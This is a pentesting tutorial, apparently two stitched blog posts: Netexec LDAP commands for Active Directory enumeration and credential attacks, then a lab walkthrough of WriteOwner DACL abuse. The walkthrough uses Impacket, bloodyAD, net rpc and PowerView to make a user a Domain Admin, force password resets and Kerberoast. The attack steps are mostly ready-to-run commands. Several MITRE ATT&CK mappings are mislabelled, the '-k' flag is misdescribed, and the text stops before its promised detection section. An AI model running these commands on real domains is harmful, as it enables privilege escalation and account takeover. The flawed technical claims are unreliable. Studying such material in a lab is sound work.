Active Directory Pentesting Using Netexec Tool: A Complete Guide

Active Directory (AD) penetration testing is an essential part of the security assessment of enterprise networks. The Netexec tool offers a wide range of capabilities for AD enumeration, credential validation, Kerberos attacks, and privilege escalation. This guide provides a detailed overview of the Netexec tool’s purpose, usage, and how to map its commands to the MITRE ATT&CK framework for Active Directory pentesting.

Table of Contents

·       Introduction to Active Directory Pentesting

·       Overview of the Netexec Tool

·       Test if an Account Exists without Kerberos

·       Testing Credentials

·       Enumerating Users

·       LDAP Queries for Specific Users

·       ASREPRoasting

·       Find Domain SID

·       Admin Count Enumeration

·       Kerberoasting

·       BloodHound Ingestor

·       User Description Enumeration

·       WhoAmI Command

·       Enumerating Group Membership

·       Group Members Enumeration

·       Machine Account Quota

·       Get User Descriptions

·       LAPS Enumeration

·       Extracting Subnet Information

·       DACL Reading

·       Get User Passwords

·       Get Unix User Password

·       Password Settings Objects (PSO)

·       Trusts Enumeration

·       Identifying Pre-Created Computer Accounts

·       Active Directory Certificate Services (ADCS)

·       Conclusion

 

Introduction to Active Directory Pentesting

Active Directory (AD) serves as the backbone for authentication and authorization in many organizations. Penetration testing AD is crucial for identifying vulnerabilities that could be exploited by attackers. Netexec is a versatile tool used for AD enumeration and exploitation. This tool assists pentesters in retrieving valuable information, testing credentials, and identifying weaknesses within an AD environment.

Overview of the Netexec Tool

The Netexec tool is primarily used for Active Directory enumeration and exploitation via LDAP. It allows pentesters to test the existence of accounts, authenticate using hashes, enumerate users and groups, and even exploit certain vulnerabilities in AD services. The tool operates via simple command-line syntax and provides a variety of options to customize the attack or enumeration process.

The basic syntax for Netexec is:

nxc ldap <target> -u <username> -p <password> <options>

Where:

• <target>: The IP address or hostname of the LDAP server.
• <username>: The username for authentication.
• <password>: The password (or NTLM hash) for authentication.
• <options>: Specific attack or enumeration options to be performed.

 

Test if an Account Exists without Kerberos

Purpose:
This command is used to check whether an account exists within Active Directory without relying on the Kerberos protocol, which may be disabled or unavailable.

nxc ldap 192.168.1.48 -u "user.txt" -p '' -k

Explanation:

• -u "user.txt": List of usernames to check.
• -p '': No password is supplied (since it's only testing account existence).
• -k: Disables Kerberos protocol usage.

MITRE ATT&CK Mapping:

T1071 - Application Layer Protocol: LDAP (This is a reconnaissance activity using LDAP).

Testing Credentials

Purpose:
This command tests a user’s credentials to validate whether they are correct, either with a plaintext password or an NTLM hash.

Using username and password:

nxc ldap 192.168.1.48 -u raj -p Password@1

Using NTLM hash:

nxc ldap 192.168.1.48 -u raj -H 64FBAE31CC352FC26AF97CBDEF151E03

Explanation:

• -u raj -p Password@1: Tests the raj user with the given password.
• -H <hash>: Uses an NTLM hash instead of a plaintext password.

MITRE ATT&CK Mapping:

T1110 - Brute Force (Credential testing using hashes).

 

Enumerating Users

Purpose:
To retrieve all user accounts in the Active Directory domain. This is a key reconnaissance step to identify potential targets for further attacks.

All users:

nxc ldap 192.168.1.48 -u raj -p Password@1 –users

Active users:

nxc ldap 192.168.1.48 -u raj -p Password@1 --active-users

 

Explanation:

• --users: Retrieves all users in the directory.
• --active-users: Filters the result to only active users (i.e., not disabled).

MITRE ATT&CK Mapping:

T1087 - Account Discovery.

 

LDAP Queries for Specific

Purpose:
Queries LDAP for specific user attributes, such as their sAMAccountName.

Query a specific user:

nxc ldap 192.168.1.48 -u raj -p Password@1 --query "(sAMAccountName=aarti)" ""

Query all users:

nxc ldap 192.168.1.48 -u raj -p Password@1 --query "(sAMAccountName=*)" ""

Explanation:

• --query "(sAMAccountName=aarti)": Queries for a user with the sAMAccountName "aarti".
• --query "(sAMAccountName=*)": Retrieves all users in the AD environment.

MITRE ATT&CK Mapping:

T1087 - Account Discovery.

 

ASREPRoasting

Purpose:
ASREPRoasting exploits accounts that do not require Kerberos pre-authentication to extract service ticket hashes, which can then be cracked offline.

Without Authentication:

nxc ldap 192.168.1.48 -u yashika -p '' --asreproast output.txt

 

With a list of users:

nxc ldap 192.168.1.48 -u "users.txt" -p '' --asreproast output.txt

Explanation:

• --asreproast output.txt: Extracts ASREP (Kerberos Pre-Authentication) hashes and saves them to output.txt.
• --dns-server: Specifies the DNS server to resolve domain names.

MITRE ATT&CK Mapping:

T1558.001 - Kerberos Ticket Extraction.

 

Find Domain SID

Purpose:
Retrieves the Domain Security Identifier (SID), which is a unique identifier for the domain.

nxc ldap 192.168.1.48 -u raj -p Password@1 --get-sid

MITRE ATT&CK Mapping:

T1071 - Application Layer Protocol: LDAP. The Domain SID is important for NTLM relay and privilege escalation attacks.

 

Admin Count Enumeration

Purpose:
Identifies high-privilege accounts such as Domain Admins by checking the AdminCount attribute.

nxc ldap 192.168.1.48 -u raj -p Password@1 --admin-count

MITRE ATT&CK Mapping:

T1087 - Account Discovery.

 

Kerberoasting

Purpose:
Kerberoasting extracts service account hashes by requesting service tickets for accounts with SPNs (Service Principal Names).

nxc ldap 192.168.1.48 -u raj -p Password@1 --kerberoasting hash.txt

MITRE ATT&CK Mapping:

T1558.001 - Kerberos Ticket Extraction.

 

BloodHound Ingestor

Purpose:
The BloodHound ingestor is used to collect data for use in BloodHound, a tool for mapping AD attack paths.

nxc ldap 192.168.1.48 -u raj -p Password@1 --bloodhound --collection All

MITRE ATT&CK Mapping:

T1087 - Account Discovery.

 

User Description Enumeration

Purpose:
Enumerates the user descriptions for identifying potential sensitive information.

nxc ldap 192.168.1.48 -u raj -p Password@1 -M user-desc

MITRE ATT&CK Mapping:

T1087 - Account Discovery.

 

WhoAmI Command

Purpose:
The whoami command retrieves the current authenticated user in the session.

 nxc ldap 192.168.1.48 -u raj -p Password@1 -M whoami

MITRE ATT&CK Mapping:

T1087 - Account Discovery.

 

Enumerating Group Membership

Purpose:
This command is used to enumerate the groups that a specific user is a member of. This helps identify high-privilege groups and lateral movement opportunities.

nxc ldap 192.168.1.48 -u raj -p Password@1 -M groupmembership -o USER="ankur"

Explanation:

• -M groupmembership: Enumerates the groups that the specified user is a member of.
• -o USER="ankur": Specifies the username for which group membership is being queried.

MITRE ATT&CK Mapping:

• T1087 - Account Discovery.
• T1075 - Pass the Hash (can be used to escalate privileges within group memberships).

 

Group Members Enumeration

Purpose:
This command allows you to enumerate the members of a specific group, such as "Domain Admins" or "Domain Users," which can reveal key targets for attacks.

Enumerating members of "Domain Users

nxc ldap 192.168.1.48 -u raj -p Password@1 -M group-mem -o GROUP="Domain users"

Enumerating members of "Domain Admins":

nxc ldap 192.168.1.48 -u raj -p Password@1 -M group-mem -o GROUP="Domain admins"

Explanation:

• -M group-mem: Enumerates the members of a specific group.
• -o GROUP="Group Name": Specifies the group to query (e.g., "Domain Admins").

MITRE ATT&CK Mapping:

T1087 - Account Discovery.

 

Machine Account Quota

Purpose:
This command checks the quota for creating machine accounts in Active Directory, which can be useful for identifying potential opportunities for creating rogue machines or bypassing group policies.

nxc ldap 192.168.1.48 -u raj -p Password@1 -M maq

MITRE ATT&CK Mapping:

T1077 - Windows Admin Shares (creating machine accounts to gain access).

 

Get User Descriptions

Purpose:
This command enumerates the descriptions associated with user accounts, which can sometimes contain valuable information such as roles, responsibilities, or even credentials.

nxc ldap 192.168.1.48 -u raj -p Password@1 -M get-desc-users

MITRE ATT&CK Mapping:

T1087 - Account Discovery.

 

LAPS Enumeration

Purpose:
LAPS (Local Administrator Password Solution) is a Microsoft solution that randomizes and stores local administrator passwords. This command retrieves the LAPS password for local administrator accounts.

nxc ldap 192.168.1.48 -u raj -p Password@1 -M laps

MITRE ATT&CK Mapping:

• T1087 - Account Discovery.
• T1110 - Brute Force (to brute force local administrator passwords).

 

Extracting Subnet Information

Purpose:
This command retrieves subnet information, which can help in identifying the network layout and plan further attacks such as lateral movement or exploiting vulnerable machines.

nxc ldap "192.168.1.48" -u "raj" -p "Password@1" -M get-network

MITRE ATT&CK Mapping:

T1010 - Application Layer Protocol: SMB.

DACL Reading

Purpose:
The DACL (Discretionary Access Control List) reading command is used to view access control lists for specific AD objects, which can help identify overly permissive access or misconfigurations.

nxc ldap 192.168.1.48 -u raj -p Password@1 --kdcHost ignite.local -M daclread -o TARGET=Administrator ACTION=read

Explanation:

• -M daclread: Reads the DACL of the specified target.
• -o TARGET=Administrator ACTION=read: Specifies the target object (e.g., "Administrator") and the action to be performed (read the DACL).

MITRE ATT&CK Mapping:

T1074 - Data Staged (collecting information about DACLs for privilege escalation).

Get User Passwords

Purpose:
This command retrieves user passwords, which can be critical for offline cracking or further attacks.

nxc ldap 192.168.1.48 -u raj -p Password@1 -M get-userPassword

MITRE ATT&CK Mapping:

T1003 - OS Credential Dumping.

Get Unix User Password

Purpose:
This command retrieves passwords for Unix-based systems if integrated with AD. It is useful for assessing whether Unix accounts are vulnerable to attacks such as Pass-the-Hash.

nxc ldap 192.168.1.48 -u raj -p Password@1 -M get-unixUserPassword

MITRE ATT&CK Mapping:

T1003.003 - OS Credential Dumping: Unix.

Password Settings Objects (PSO)

Purpose:
This command retrieves the Password Settings Objects (PSO), which are used to define password policies in AD. If misconfigured, these could allow an attacker to bypass certain password requirements.

nxc ldap 192.168.1.48 -u administrator -p Ignite@987 -M pso

MITRE ATT&CK Mapping:

T1071 - Application Layer Protocol: LDAP (retrieving password policies).

Trusts Enumeration

Purpose:
Enumerates trust relationships between different domains, which can be useful for lateral movement and attacking interconnected domains.

nxc ldap 192.168.1.48 -u raj -p Password@1 -M enum_trusts

MITRE ATT&CK Mapping:

T1076 - Remote Desktop Protocol (RDP) (used for lateral movement once trust relationships are identified).

Identifying Pre-Created Computer Accounts

Purpose:
This command identifies pre-created computer accounts that could be used for bypassing security controls or creating rogue machines on the network.

nxc ldap 192.168.1.48 -u raj -p Password@1 -M pre2k

MITRE ATT&CK Mapping:

T1077 - Windows Admin Shares.

Active Directory Certificate Services (ADCS)

Purpose:
ADCS can be exploited to issue certificates for unauthorized machines. This command checks for misconfigurations or exploitable configurations within ADCS.

nxc ldap 192.168.1.48 -u raj -p Password@1 -M adcs

MITRE ATT&CK Mapping:

T1553.003 - Application Layer Protocol: SMB.

Conclusion

The Netexec tool offers a powerful suite of features for AD pentesting. It can help identify misconfigurations, discover critical attack paths, and validate vulnerabilities. This tool plays a crucial role in the process of assessing the security posture of an Active Directory environment and can be used for both red team operations and vulnerability assessments.

By understanding the purpose and usage of each Netexec command, penetration testers can effectively map their attacks to the MITRE ATT&CK framework, ensuring that the assessment is thorough and aligned with industry-standard tactics, techniques, and procedures (TTPs).

Abusing AD-DACL: WriteOwner

 In this post, we will explore the exploitation of Discretionary Access Control Lists (DACL) using the WriteOwner permission in Active Directory environments. The WriteOwner permission can be abused by an attacker to change the object owner to an attacker-controlled user and take over the object.

The lab setup necessary to simulate these attacks is outlined, with methods mapped to the MITRE ATT&CK framework to clarify the associated techniques and tactics. Detection mechanisms for identifying suspicious activities linked to WriteOwner attacks are also covered, alongside actionable recommendations for mitigating these vulnerabilities. This overview equips security professionals with critical insights to recognize and defend against these prevalent threats.

Table of Contents

Abusing AD-DACL- WriteOwner

WriteOwner Permission

Prerequisites

Lab Setup – User Owns WriteOwner Permission on the Domain Admin Group

Exploitation Phase I – User Owns WriteOwner Permission on a Group

Bloodhound - Hunting for Weak Permission

Method for Exploitation – Granting Ownership & Full Control Followed by Account Manipulation (T1098)

1.       Linux Impacket tool – Granting Ownership & Full Control

1.1.   Linux – Adding Member to the Group

Linux Net RPC – Samba

Linux Bloody AD

2.       Windows PowerShell Powerview – Granting Ownership & Full Control

2.1.   Windows Net command – Adding Member to the Group

Lab Setup – User Owns WriteOwner Permission on Another User

Exploitation Phase II – User Owns WriteOwner Permission on Another User

Bloodhound - Hunting for Weak Permission

Method for Exploitation – Granting Ownership & Full Control Followed by Kerberoasting (T1558.003) or Change Password (T1110.001)

1.       Linux Impacket tool – Granting Ownership & Full Control

1.1.   Linux Python Script – TargetedKerberoast

1.2.   Linux – Change Password

Linux Net RPC – Samba

Linux Bloody AD

2.       Windows PowerShell Powerview – Granting Ownership & Full Control

2.1.   Windows PowerShell Powerview – Kerberoasting

2.2.   Windows PowerShell Powerview – Change Password

Detection & Mitigation

WriteOwner Permission

The WriteOwner permission allows a user to change the ownership of an object to a different user or principal, including one controlled by an attacker. By exploiting this permission, an attacker can take ownership of a target object.

Once the attacker successfully changes the ownership of the object to a principal under their control, they gain the ability to fully manipulate the object. This includes modifying permissions to grant themselves or others full control over the object. For example, the attacker could grant "Full Control" permissions, allowing unrestricted access to read, write, or delete the object.

WriteOwner permissions on a group allow granting the right to add members to that group.

WriteOwner permissions on a user allow granting full control over the user object.

WriteOwner permissions on a computer object allow granting full control over the computer object.

WriteOwner permissions on a domain object allow granting the ability to perform a DCSync operation.

Prerequisites

• Windows Server 2019 as Active Directory
• Kali Linux
• Tools: Bloodhound, Net RPC, Powerview, BloodyAD, Impacket
• Windows 10/11 – As Client

Lab Setup – User Owns WriteOwner Permission on the Domain Admin Group

Create the AD Environment:

To simulate an Active Directory environment, you will need a Windows Server as a Domain Controller (DC) and a client machine (Windows or Linux) where you can run enumeration and exploitation tools.

Domain Controller:

·       Install Windows Server (2016 or 2019 recommended).

·       Promote it to a Domain Controller by adding the Active Directory Domain Services role.

·       Set up the domain (e.g., ignite.local).

 

User Accounts:

·       Create a standard user account named Aaru.

 

net user aaru Password@1 /add /domain

 

 

Assign the "WriteOwner" Privilege to Aaru:

Once your AD environment is set up, you need to assign the "WriteOwner" privilege to Aaru over the Domain Admins group.

Steps:

1.       Open Active Directory Users and Computers (ADUC) on the Domain Controller.

2.       Enable the Advanced Features view by clicking on View > Advanced Features.

3.       Locate the Domain Admins group in the Users container.

4.       Right-click on Domain Admins and go to Properties.

5.        

 

 

Go to the Security tab, and click on Add button

 

 

In the “Enter the object name to select” box, type Aaru and click Check Names and click on OK.

 

Select Aaru user and in the Permissions section, and click on Advanced option

 

1.       In the Advanced security settings box, double-click on Aaru user’s permission entry.

2.       In the Permissions section, check the box for Modify Owner rights.

3.       Apply the settings.

At this point, Aaru now has WriteOwner rights over the Domain Admins group, meaning they can add themselves to the group.

 

Exploitation Phase II – User Owns WriteOwner Permission on a Group

Bloodhound - Hunting for Weak Permission

Use BloodHound to Confirm Privileges: You can use BloodHound to verify that Aaru has the WriteOwner permission on the Domain Admins group.

bloodhound-python -u aaru -p Password@1 -ns 192.168.1.6 -d ignite.local -c All

From the graphical representation of Bloodhound, the tester would like to identify the outbound object control for selected user where the first degree of object control value is equal to 1.

Thus, it has shown the Aaru User has WriteOwner privilege over Domain Admins group.

 

Method for Exploitation – Granting Ownership & Full Control Followed by Account Manipulation (T1098)

Linux Impacket tool – Granting Ownership & Full Control

Granting Ownership:

From UNIX-like systems, this can be done with Impacket's owneredit.py (Python), alternatively Impacket-owneredit

impacket-owneredit -action write -new-owner 'aaru' -target-dn 'CN=Domain Admins,CN=Users,DC=ignite,DC=local' 'ignite.local'/'aaru':'Password@1' -dc-ip 192.168.1.6

With the help of owneredit, the DACL for this object is successfully modified, aaru user now have Ownership over the group.

Granting Full Control:

Let’s grant the user 'Aaru' full control over the Domain Admins group using Impacket’s dacledit tool.

From UNIX-like systems, this can be done with Impacket's dacledit.py (Python), alternatively Impacket-dacledit.

impacket-dacledit -action 'write' -rights 'WriteMembers' -principal 'aaru' -target-dn 'CN=Domain Admins,CN=Users,DC=ignite,DC=local' 'ignite.local'/'aaru':'Password@1' -dc-ip 192.168.1.6

 

With the help of dacledit, the DACL for this object is successfully modified, aaru user now have full Control over the group.

1. 

Linux – Adding Member to the Group

Linux Net RPC – Samba

The tester can abuse this permission by adding Aaru User into Domain Admin group and list the domain admin members to ensure that Aaru Users becomes Domain Admin.

net rpc group addmem "Domain Admins" aaru -U ignite.local/aaru%'Password@1' -S 192.168.1.6

Linux Bloody AD

Alternatively, it can be achieved using bloodyAD

bloodyAD --host "192.168.1.6" -d "ignite.local" -u "aaru" -p "Password@1" add groupMember "Domain Admins" "aaru"

Windows PowerShell Powerview – Granting Ownerahip & Full Control

From a Windows system, this can be achieved with Set-DomainObjectOwner to grant ownership followed by Add-DomainObjectAcl (PowerView module) to grant full permission over the target.

powershell -ep bypass

Import-Module .\PowerView.ps1

Set-DomainObjectOwner -Identity 'Domain Admins' -OwnerIdentity 'aaru'

Add-DomainObjectAcl -Rights 'All' -TargetIdentity "Domain Admins" -PrincipalIdentity "aaru"

2. 

Windows Net command – Adding Member to the Group

This can be achieved with a native command line, using windows net command.

net group "domain admins" aaru /add /domain

thus, from user property we can see Aaru user has become the member of domain admin.

 

Lab Setup – User Owns WriteOwner Permission on Another User

Here, in this lab setup, we will create two users’ Ankur and Sakshi, where the user Sakshi has WriteOwner permission over the Ankur user.

Create the AD Environment and User accounts

To simulate an Active Directory environment, you will need a Windows Server as a Domain Controller (DC) and a client machine (Windows or Linux) where you can run enumeration and exploitation tools.

Domain Controller:

·       Install Windows Server (2016 or 2019 recommended).

·       Promote it to a Domain Controller by adding the Active Directory Domain Services role.

·       Set up the domain (e.g., ignite.local).

 

User Accounts:

·       Create two AD user accounts named Ankur and Sakshi.

 

net user ankur Password@1 /add /domain

net user sakshi Password@1 /add /domain

Assign the "WriteOwner" Privilege:

1.       Open Active Directory Users and Computers (ADUC) on the Domain Controller.

2.       Enable the Advanced Features view by clicking on View > Advanced Features.

3.       Locate User Ankur in the Users container.

4.       Right-click on Ankur User and go to Properties.

 

1.       Go to the Security tab, and click on Add button

2.       In the “Enter the object name to select” box, type Sakshi and click Check Names and click on OK.

3.       Select Sakshi user and in the Permissions section, and click on Advanced option.

 

 

1.       In the Advanced security settings box, double-click on Sakshi user’s permission entry.

2.       In the Permissions section, check the box for Modify owner rights.

3.       Apply the settings.

At this point, Sakshi now has WriteOwner permission over Ankur user.

 

Exploitation Phase I – User Owns WriteOwner Permission on Another User

Bloodhound - Hunting for Weak Permission

Use BloodHound to Confirm Privileges: You can use BloodHound to verify that Sakshi has the WriteOwner permission for Ankur user.

bloodhound-python -u sakshi -p Password@1 -ns 192.168.1.6 -d ignite.local -c All

From the graphical representation of Bloodhound, the tester would like to identify the outbound object control for selected user where the first degree of object control value is equal to 1.

 

 

From the graph it can be observed that the Sakshi user owns WriteOwner privilege on Ankur user.

 

Method for Exploitation – Granting Ownership & Full Control Followed by Kerberoasting (T1558.003) or Change Password (T1110.001)

This abuse can be carried out when controlling an object that has WriteOwner over another object.

Linux Impacket tool – Granting Ownership & Full Control

Granting Ownership:

From UNIX-like systems, this can be done with Impacket's owneredit.py (Python), alternatively Impacket-owneredit.

owneredit.py -action write -new-owner 'sakshi' -target-dn 'CN=ankur,CN=Users,DC=ignite,DC=local' 'ignite.local'/'sakshi':'Password@1' -dc-ip 192.168.1.6

With the help of owneredit, the DACL for this object is successfully modified, Sakshi user now have Ownership over Ankur user.

Granting Full Control:

Let’s grant the user 'Sakshi' full control over the Ankur user using Impacket’s dacledit tool.

From UNIX-like systems, this can be done with Impacket's dacledit.py (Python), alternatively Impacket-dacledit.

impacket-dacledit -action 'write' -rights 'FullControl' -principal 'sakshi' -target-dn 'CN=ankur,CN=Users,DC=ignite,DC=local' 'ignite.local'/'sakshi':'Password@1' -dc-ip 192.168.1.6

With the help of dacledit, the DACL for this object is successfully modified, Sakshi user now have full Control over Ankur user.

Now, since the user has full control over the target then it can either perform kerberoasting or can change the password without knowing target’s current password (ForceChangePassword)

 

1. 

Linux Python Script – TargetedKerberoast

From UNIX-like systems, this can be done with targetedKerberoast.py (Python).

./targetedKerberoast.py --dc-ip '192.168.1.6' -v -d 'ignite.local' -u 'sakshi' -p 'Password@1'

Further, with the help of John the Ripper end the dictionary such as Rock You can help the attacker to brute force the weak password.

Linux – Change Password

Linux Net RPC – Samba

It can be achieved from UNIX-like system with net, a tool for the administration of samba and cifs/smb clients.

net rpc password ankur 'Password@987' -U ignite.local/sakshi%'Password@1' -S 192.168.1.6

 Linux Bloody AD

Alternatively, it can be achieved using bloodyAD

bloodyAD --host "192.168.1.6" -d "ignite.local" -u "sakshi" -p "Password@1" set password "ankur" "Password@987"

Windows PowerShell Powerview – Granting Ownership & Full Control

From a Windows system, this can be achieved with with Set-DomainObjectOwner to grant ownership followed by Add-DomainObjectAcl (PowerView module) to grant full permission over the target.

powershell -ep bypass

Import-Module .\PowerView.ps1

Set-DomainObjectOwner -Identity 'ankur' -OwnerIdentity 'sakshi'

Add-DomainObjectAcl -Rights 'All' -TargetIdentity "ankur" -PrincipalIdentity "sakshi"

With the help of Set-DomainObjectOwner and Add-DomainObjectAcl, the DACL for this object is successfully modified, Sakshi user now have full Control over Ankur user.

Now, since the user has full control over the target then it can either perform kerberoasting or can change the password without knowing target’s current password (ForceChangePassword)

 

 

1. 

2. 

Windows PowerShell Powerview – Kerberoasting

From Windows machines, this can be achieved with Set-DomainObject and Get-DomainSPNTicket (PowerView module).

Set-DomainObject -Identity 'ankur' -Set @{serviceprincipalname='nonexistent/hacking'}

Get-DomainUser 'ankur' | Select serviceprincipalname

$User = Get-DomainUser 'ankur'

$User | Get-DomainSPNTicket

Windows PowerShell Powerview – Change Password

Linux Net RPC – Samba

The attacker can change the password of the user using PowerView module. This can be achieved with Set-DomainUserPassword cmdlet.

$NewPassword = ConvertTo-SecureString 'Password1234' -AsPlainText -Force

Set-DomainUserPassword -Identity 'ankur' -AccountPassword $NewPassword